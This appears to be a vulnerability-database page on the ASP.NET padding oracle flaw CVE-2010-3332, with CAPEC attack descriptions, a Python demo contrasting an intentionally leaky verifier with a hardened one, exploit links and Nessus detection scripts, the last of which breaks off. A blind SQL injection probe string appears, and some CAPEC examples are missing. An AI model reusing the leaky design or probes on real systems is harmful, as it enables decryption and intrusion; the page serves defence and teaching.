CVE-2010-3332 - Information Exposure Through an Error Message vulnerability in Microsoft .Net Framework

CVSS 6.4 - MEDIUM
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: NONE
Tags: network, low complexity, microsoft, CWE-209, nessus, exploit available

Summary

Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability."

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Fuzzing for garnering J2EE/.NET-based stack traces, for application mapping
    An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes any stack traces produced by error messages. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages, but by attempting a large number of message variants they may find a variant that triggers the desired behavior. In this attack, the purpose of the fuzzing is to cause the targeted application to return an error including a stack trace, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. The stack trace enumerates the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.
  • Fuzzing and observing application log data/errors for application mapping
    An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages, but by attempting a large number of message variants they may find a variant that triggers the desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information.
  • Padding Oracle Crypto Attack
    An attacker is able to efficiently decrypt data without knowing the decryption key if a target system leaks whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle, and an attacker is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an attacker is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key. Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and the information about a padding error is then leaked to the attacker. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client-side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the attacker whether a padding error occurred during decryption, in whatever form it comes, is sufficient for the attacker to break the cryptosystem. That bit of information can come in the form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross-domain, where an attacker is able to use cross-domain information leaks to get the bits of information from the padding oracle of a target system or service with which the victim is communicating. To do so, an attacker sends a request containing ciphertext to the target system. Due to the browser's same-origin policy, the attacker is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., whether or not a padding error has occurred). For instance, this can be done using an "img" tag plus the onerror()/onload() events. The attacker's JavaScript can make web browsers load an image from the target site and learn whether the image loaded. That is the one bit of information the padding oracle attack needs: if the image loads, the padding was valid; otherwise it was not.
  • Probe Application Error Reporting
    An attacker, aware of an application's location (and possibly authorized to use the application), can probe the application's structure and evaluate its robustness by probing its error conditions (not unlike one would during a 'fuzz' test, but more purposefully here) in order to support attacks such as blind SQL injection, or for the more general task of mapping the application to mount another subsequent attack.
  • Blind SQL Injection
    Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages is considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the attacker constructs input strings that probe the target through simple Boolean SQL expressions. The attacker can determine whether the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the attacker determines how and where the target is vulnerable to SQL Injection. For example, an attacker may try entering something like "username' AND 1=1; --" in an input field. If the result is the same as when the attacker entered "username" in the field, then the attacker knows that the application is vulnerable to SQL Injection. The attacker can then ask yes/no questions of the database server to extract information from it. For example, the attacker can extract table names from a database using the following types of queries: If the above query executes properly, then the attacker knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the attacker knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the attacker can determine all table names in the database. Subsequently, the attacker may execute an actual attack and send something like:
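The padding oracle entry above turns on a single implementation detail: a decryption routine that lets the caller distinguish a padding failure from any other failure is the oracle, and the remedy is to authenticate the ciphertext before decrypting it and to report every failure the same way (the "checksum after encryption" change that the Mono update described further down this page made). The following Python is an added example written for this page; it is not code from Microsoft, Mono, Tenable or the CAPEC entry. It uses a toy hash-based Feistel block cipher (constructed for the demo, not secure) in CBC mode with PKCS#7 padding so that it runs offline with the standard library only, and contrasts a checksum-then-encrypt verifier that leaks the padding/checksum distinction with an encrypt-then-MAC verifier that does not. The key, IV and message are constructed values.

```python
import hashlib
import hmac

BLOCK = 16      # block size in bytes of the toy cipher
ROUNDS = 4      # Feistel rounds of the toy cipher
TAG_LEN = 8     # inner checksum length in the vulnerable design
MAC_LEN = 32    # HMAC-SHA256 tag length in the hardened design

def _xor(a: bytes, b: bytes) -> bytes: return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, half: bytes, i: int) -> bytes:
    # Keyed round function of a toy hash-based Feistel cipher (constructed for the demo, not secure).
    return hashlib.sha256(key + bytes([i]) + half).digest()[: BLOCK // 2]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round(key, right, i))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for i in reversed(range(ROUNDS)):
        left, right = _xor(right, _round(key, left, i)), left
    return left + right

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK          # PKCS#7: always adds 1..BLOCK bytes
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i : i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i : i + BLOCK]
        out += _xor(block_decrypt(key, cur), prev)
        prev = cur
    return out

# Vulnerable design: checksum placed inside the encryption, and two distinguishable failures.
def vuln_protect(key: bytes, iv: bytes, msg: bytes) -> bytes:
    inner = msg + hashlib.sha256(msg).digest()[:TAG_LEN]   # "encryption after checksum"
    return iv + cbc_encrypt(key, iv, pad(inner))

def vuln_unprotect(key: bytes, blob: bytes) -> str:
    iv, ct = blob[:BLOCK], blob[BLOCK:]
    try:
        inner = unpad(cbc_decrypt(key, iv, ct))
    except ValueError:
        return "padding_error"       # reported differently from a checksum failure: this is the oracle
    msg, tag = inner[:-TAG_LEN], inner[-TAG_LEN:]
    if not hmac.compare_digest(tag, hashlib.sha256(msg).digest()[:TAG_LEN]):
        return "checksum_error"
    return "ok"

# Hardened design: HMAC over IV||ciphertext is checked first, and every failure looks the same.
def _mac_key(key: bytes) -> bytes: return hashlib.sha256(b"mac|" + key).digest()   # separate MAC key

def safe_protect(key: bytes, iv: bytes, msg: bytes) -> bytes:
    body = iv + cbc_encrypt(key, iv, pad(msg))
    return body + hmac.new(_mac_key(key), body, hashlib.sha256).digest()   # "checksum after encryption"

def safe_unprotect(key: bytes, blob: bytes) -> str:
    body, tag = blob[:-MAC_LEN], blob[-MAC_LEN:]
    if not hmac.compare_digest(hmac.new(_mac_key(key), body, hashlib.sha256).digest(), tag):
        return "invalid"             # every tampered input ends here, before any decryption happens
    unpad(cbc_decrypt(key, body[:BLOCK], body[BLOCK:]))   # authentic data, so the padding is intact
    return "ok"

def tamper(blob: bytes, index: int, mask: int = 0x80) -> bytes:
    return bytes(b ^ (mask if k == index else 0) for k, b in enumerate(blob))

KEY = b"constructed-demo-key"        # constructed
IV = bytes(range(BLOCK))             # constructed and fixed, so the demo is deterministic
MSG = b"user=alice;role=member"      # constructed 22-byte token
def demo() -> dict:
    v, s = vuln_protect(KEY, IV, MSG), safe_protect(KEY, IV, MSG)
    v_last, s_last = len(v) - BLOCK - 1, len(s) - MAC_LEN - BLOCK - 1   # ciphertext byte XORed into the padding
    return {
        "vuln_ok": vuln_unprotect(KEY, v),
        "vuln_last_byte": vuln_unprotect(KEY, tamper(v, v_last)),     # padding check fails
        "vuln_first_byte": vuln_unprotect(KEY, tamper(v, 0, 0x01)),   # padding passes, checksum fails
        "safe_ok": safe_unprotect(KEY, s),
        "safe_last_byte": safe_unprotect(KEY, tamper(s, s_last)),
        "safe_first_byte": safe_unprotect(KEY, tamper(s, 0, 0x01)),
    }
```

`demo()` evaluates the same three inputs against both verifiers: the untouched token, a token whose last plaintext byte was altered (so the padding check fails) and one whose first plaintext byte was altered (so the padding check passes and only the checksum fails). The vulnerable verifier reports three different outcomes, which is exactly the one bit per query that the CAPEC text describes; the hardened verifier reports only "ok" or "invalid", and because it never runs the block cipher on data that has not passed the MAC, neither the error text nor the timing of the padding check is observable to whoever submits the token. The constant-time `hmac.compare_digest` matters for the same reason: a byte-by-byte tag comparison would turn the MAC itself into a timing oracle.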

Exploit-Db

  • description: MS10-070 ASP.NET Padding Oracle File Download. CVE-2010-3332. Remote exploit for asp platform
    id: EDB-ID:15265
    last seen: 2016-02-01
    modified: 2010-10-17
    published: 2010-10-17
    reporter: Agustin Azubel
    source: https://www.exploit-db.com/download/15265/
    title: ASP.NET Padding Oracle File Download MS10-070
  • description: ASP.NET Padding Oracle Vulnerability (MS10-070). CVE-2010-3332. Remote exploit for asp platform
    id: EDB-ID:15213
    last seen: 2016-02-01
    modified: 2010-10-06
    published: 2010-10-06
    reporter: Giorgio Fedon
    source: https://www.exploit-db.com/download/15213/
    title: ASP.NET Padding Oracle Vulnerability MS10-070
  • description: MS10-070 ASP.NET Auto-Decryptor File Download Exploit. CVE-2010-3332. Remote exploit for windows platform
    id: EDB-ID:15292
    last seen: 2016-02-01
    modified: 2010-10-20
    published: 2010-10-20
    reporter: Agustin Azubel
    source: https://www.exploit-db.com/download/15292/
    title: ASP.NET Auto-Decryptor File Download Exploit MS10-070

Msbulletin

bulletin_id: MS10-070
bulletin_url:
date: 2010-09-28T00:00:00
impact: Information Disclosure
knowledgebase_id: 2418042
knowledgebase_url:
severity: Important
title: Vulnerability in ASP.NET Could Allow Information Disclosure

Nessus

  • NASL family: Windows : Microsoft Bulletins
    NASL id: SMB_NT_MS10-070.NASL
    description: There is an information disclosure vulnerability in ASP.NET, part of the .NET framework. Information can be leaked due to improper error handling during encryption padding. A remote attacker could exploit this to decrypt and modify an ASP.NET application's server-encrypted data.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 49695
    published: 2010-09-28
    reporter: This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/49695
    title: MS10-070: Vulnerability in ASP.NET Could Allow Information Disclosure (2418042)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    include("compat.inc");
    
    
    if (description)
    {
      script_id(49695);
      script_version("1.23");
      script_cvs_date("Date: 2018/11/15 20:50:30");
    
      script_cve_id("CVE-2010-3332");
      script_bugtraq_id(43316);
      script_xref(name:"MSFT", value:"MS10-070");
      script_xref(name:"MSKB", value:"2416447");
      script_xref(name:"MSKB", value:"2416451");
      script_xref(name:"MSKB", value:"2416468");
      script_xref(name:"MSKB", value:"2416469");
      script_xref(name:"MSKB", value:"2416470");
      script_xref(name:"MSKB", value:"2416471");
      script_xref(name:"MSKB", value:"2416472");
      script_xref(name:"MSKB", value:"2416473");
      script_xref(name:"MSKB", value:"2416474");
      script_xref(name:"MSKB", value:"2418240");
      script_xref(name:"MSKB", value:"2418241");
    
      script_name(english:"MS10-070: Vulnerability in ASP.NET Could Allow Information Disclosure (2418042)");
      script_summary(english:"Checks version of System.web.dll / System.web.extensions.dll");
    
      script_set_attribute(
        attribute:"synopsis",
        value:
    "The version of the .NET framework installed on the remote host has an
    information disclosure vulnerability."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "There is an information disclosure vulnerability in ASP.NET, part of
    the .NET framework.  Information can be leaked due to improper error
    handling during encryption padding.
    
    A remote attacker could exploit this to decrypt and modify an ASP.NET
    application's server-encrypted data.  In .NET Framework 3.5 SP1 and
    above, an attacker could exploit this to download any file within the
    ASP.NET application, including web.config."
      );
      script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-070");
      script_set_attribute(
        attribute:"solution",
        value:
    "Microsoft has released a set of patches for the .NET Framework on
    Windows XP, 2003, Vista, 2008, 7, and 2008 R2."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2010/09/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2010/09/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/09/28");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
    
      script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:.net_framework");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows : Microsoft Bulletins");
    
      script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.");
    
      script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
      script_require_keys("SMB/MS_Bulletin_Checks/Possible");
      script_require_ports(139, 445, 'Host/patch_management_checks');
    
      exit(0);
    }
    
    include("audit.inc");
    include("smb_func.inc");
    include("smb_hotfixes.inc");
    include("smb_hotfixes_fcheck.inc");
    include("misc_func.inc");
    
    get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");
    
    bulletin = 'MS10-070';
    kbs = make_list("2416447", "2416451", "2416468", "2416469", "2416470", "2416471", "2416472", "2416473", "2416474", "2418240", "2418241");
    if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);
    
    get_kb_item_or_exit("SMB/Registry/Enumerated");
    ver = get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);
    
    if (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'1,2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);
    
    if (ver == '6.0' && hotfix_check_server_core() == 1)
      audit(AUDIT_WIN_SERVER_CORE);
    
    rootfile = hotfix_get_systemroot();
    if (!rootfile) exit(1, "Failed to get the system root.");
    
    share = hotfix_path2share(path:rootfile);
    if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);
    
    ass_dir = hotfix_get_programfilesdir() + "\Reference Assemblies\Microsoft\Framework";
    vuln = 0;
    
    # 1.1 SP1 on XP, 2k3 x64, Vista, 2k8 (KB2416447)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"1.1.4322.2470", min_version:"1.1.4322.0", dir:"\Microsoft.NET\Framework\v1.1.4322");
    missing += hotfix_is_vulnerable(os:"5.2", arch:"x64", file:"System.Web.dll", version:"1.1.4322.2470", min_version:"1.1.4322.0", dir:"\Microsoft.NET\Framework\v1.1.4322");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.dll", version:"1.1.4322.2470", min_version:"1.1.4322.0", dir:"\Microsoft.NET\Framework\v1.1.4322");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416447');
    vuln += missing;
    
    # 1.1 SP1 on 2k3 x86 (KB2416451)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.2", arch:"x86", file:"System.Web.dll", version:"1.1.4322.2470", min_version:"1.1.4322.0", dir:"\Microsoft.NET\Framework\v1.1.4322");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416451');
    vuln += missing;
    
    # 3.5 on XP, 2k3 (KB2416468)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"2.0.50727.1887", min_version:"2.0.50727.1433", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"2.0.50727.1887", min_version:"2.0.50727.1433", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416468');
    vuln += missing;
    
    # 3.5 on XP, 2k3, Vista, 2k8 (KB2418240)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.Extensions.dll", version:"3.5.21022.239", min_version:"3.5.21022.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.Extensions.dll", version:"3.5.21022.239", min_version:"3.5.21022.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"6.0", sp:2, file:"System.Web.Extensions.dll", version:"3.5.21022.239", min_version:"3.5.21022.0", path:ass_dir + "\v3.5");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2418240');
    vuln += missing;
    
    # 3.5 SP1 and 2.0 SP2 on XP, 2k3 (KB2418241)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"2.0.50727.3618", min_version:"2.0.50727.3000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.5000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"2.0.50727.3618", min_version:"2.0.50727.3000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.5000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2418241');
    vuln += missing;
    
    # 3.5 SP1 on XP, 2k3, Vista, 2k8 (KB2416473)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.Extensions.dll", version:"3.5.30729.3644", min_version:"3.5.30729.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.Extensions.dll", version:"3.5.30729.5053", min_version:"3.5.30729.5000", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.Extensions.dll", version:"3.5.30729.3644", min_version:"3.5.30729.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.Extensions.dll", version:"3.5.30729.5053", min_version:"3.5.30729.5000", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.Extensions.dll", version:"3.5.30729.3644", min_version:"3.5.30729.0", path:ass_dir + "\v3.5");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.Extensions.dll", version:"3.5.30729.5053", min_version:"3.5.30729.5000", path:ass_dir + "\v3.5");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416473');
    vuln += missing;
    
    # 2.0 SP1 and 3.5 on Vista SP1 and 2008 (KB2416469)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"6.0", sp:1, file:"System.web.dll", version:"2.0.50727.1887", min_version:"2.0.50727.1000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416469');
    vuln += missing;
    
    # 2.0 SP2 and 3.5 SP1 on Vista SP1 and 2008 (KB2416474)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"6.0", sp:1, file:"System.web.dll", version:"2.0.50727.3618", min_version:"2.0.50727.3000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"6.0", sp:1, file:"System.web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.4400", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416474');
    vuln += missing;
    
    # 2.0 SP2 and 3.5 SP1 on Vista SP2, 2k8 SP2 (KB2416470)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"6.0", sp:2, file:"System.web.dll", version:"2.0.50727.4209", min_version:"2.0.50727.3000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"6.0", sp:2, file:"System.web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.4400", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416470');
    vuln += missing;
    
    # 3.5.1 on Windows 7 and 2008 R2 (KB2416471)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"6.1", sp:0, file:"System.web.dll", version:"2.0.50727.5053", min_version:"2.0.50727.5000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    missing += hotfix_is_vulnerable(os:"6.1", sp:0, file:"System.web.dll", version:"2.0.50727.4955", min_version:"2.0.50727.4000", dir:"\Microsoft.NET\Framework\v2.0.50727");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416471');
    vuln += missing;
    
    # 4.0 on XP, 2k3, Vista, 2k8, 7, 2008 R2 (KB2416472)
    missing = 0;
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"4.0.30319.206", min_version:"4.0.30319.0", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"5.1", file:"System.Web.dll", version:"4.0.30319.363", min_version:"4.0.30319.300", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"4.0.30319.206", min_version:"4.0.30319.0", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"5.2", file:"System.Web.dll", version:"4.0.30319.363", min_version:"4.0.30319.300", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.dll", version:"4.0.30319.206", min_version:"4.0.30319.0", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"6.0", file:"System.Web.dll", version:"4.0.30319.363", min_version:"4.0.30319.300", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"6.1", file:"System.Web.dll", version:"4.0.30319.206", min_version:"4.0.30319.0", dir:"\Microsoft.NET\Framework\v4.0.30319");
    missing += hotfix_is_vulnerable(os:"6.1", file:"System.Web.dll", version:"4.0.30319.363", min_version:"4.0.30319.300", dir:"\Microsoft.NET\Framework\v4.0.30319");
    if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:'2416472');
    vuln += missing;
    
    if (vuln > 0)
    {
      set_kb_item(name:"SMB/Missing/MS10-070", value:TRUE);
      hotfix_security_warning();
    
      hotfix_check_fversion_end();
      exit(0);
    }
    else
    {
      hotfix_check_fversion_end();
      audit(AUDIT_HOST_NOT, 'affected');
    }
    
  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_BYTEFX-DATA-MYSQL-8001.NASL
    description: The FORMS authentication methods of the mono ASP.net implementation were vulnerable to a padding oracle attack as described in CVE-2010-3332, as they did encryption after checksum. This update changes the method to checksum after encryption to avoid this attack.
    last seen: 2020-06-05
    modified: 2012-03-21
    plugin id: 58408
    published: 2012-03-21
    reporter: This script is Copyright (C) 2012-2020 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/58408
    title: SuSE 10 Security Update : Mono (ZYPP Patch Number 8001)
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The text description of this plugin is (C) Novell, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(58408);
      script_version ("1.7");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2010-3332");
    
      script_name(english:"SuSE 10 Security Update : Mono (ZYPP Patch Number 8001)");
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote SuSE 10 host is missing a security-related patch."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The FORMS authentication methods of mono ASP.net implementation were
    vulnerable to a padding oracle attack as described in CVE-2010-3332,
    as they did encryption after checksum.
    
    This update changes the method to checksum after encryption to avoid
    this attack."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://support.novell.com/security/cve/CVE-2010-3332.html"
      );
      script_set_attribute(attribute:"solution", value:"Apply ZYPP patch number 8001.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2012/02/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2012/03/21");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2012-2020 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
    
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled.");
    if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE.");
    if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages.");
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) exit(1, "Failed to determine the architecture type.");
    if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 10 on the '"+cpu+"' architecture have not been implemented.");
    
    
    flag = 0;
    if (rpm_check(release:"SLED10", sp:4, reference:"bytefx-data-mysql-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"ibm-data-db2-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-core-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-firebird-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-oracle-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-postgresql-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-sqlite-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-data-sybase-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-devel-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-extras-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-locale-extras-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-nunit-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-web-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, reference:"mono-winforms-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLED10", sp:4, cpu:"x86_64", reference:"mono-core-32bit-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-core-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-firebird-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-oracle-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-postgresql-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-sqlite-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-data-sybase-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-locale-extras-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-nunit-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-web-1.2.2-12.32.1")) flag++;
    if (rpm_check(release:"SLES10", sp:4, reference:"mono-winforms-1.2.2-12.32.1")) flag++;
